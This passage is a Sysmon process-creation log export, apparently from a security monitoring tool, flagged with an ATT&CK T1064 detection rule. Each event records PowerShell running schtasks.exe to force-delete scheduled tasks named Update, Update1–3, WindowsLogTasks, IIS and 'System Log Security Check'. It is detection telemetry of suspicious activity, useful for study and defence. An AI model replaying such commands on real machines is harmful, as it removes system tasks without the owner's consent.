7372\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.933"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001091f42e00}"",""processId"":""7372"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.237",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.876 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00106cf22e00} +ProcessId: 6672 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.879480100Z"",""eventRecordID"":""3561"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.876\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00106cf22e00}\r\nProcessId: 6672\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.876"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00106cf22e00}"",""processId"":""6672"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.221",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.825 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107df02e00} +ProcessId: 7452 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.830609400Z"",""eventRecordID"":""3560"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.825\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107df02e00}\r\nProcessId: 7452\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.825"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00107df02e00}"",""processId"":""7452"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.550",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.784 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00108dee2e00} +ProcessId: 7136 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.786882700Z"",""eventRecordID"":""3559"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.784\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00108dee2e00}\r\nProcessId: 7136\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.784"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00108dee2e00}"",""processId"":""7136"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.530",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.736 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010aaec2e00} +ProcessId: 7340 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.754918500Z"",""eventRecordID"":""3558"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.736\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010aaec2e00}\r\nProcessId: 7340\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.736"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-0010aaec2e00}"",""processId"":""7340"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.499",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.698 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010b4ea2e00} +ProcessId: 2096 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.701812000Z"",""eventRecordID"":""3557"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.698\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010b4ea2e00}\r\nProcessId: 2096\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.698"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-0010b4ea2e00}"",""processId"":""2096"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.483",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.663 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001012e92e00} +ProcessId: 7336 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.666063800Z"",""eventRecordID"":""3556"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.663\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001012e92e00}\r\nProcessId: 7336\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 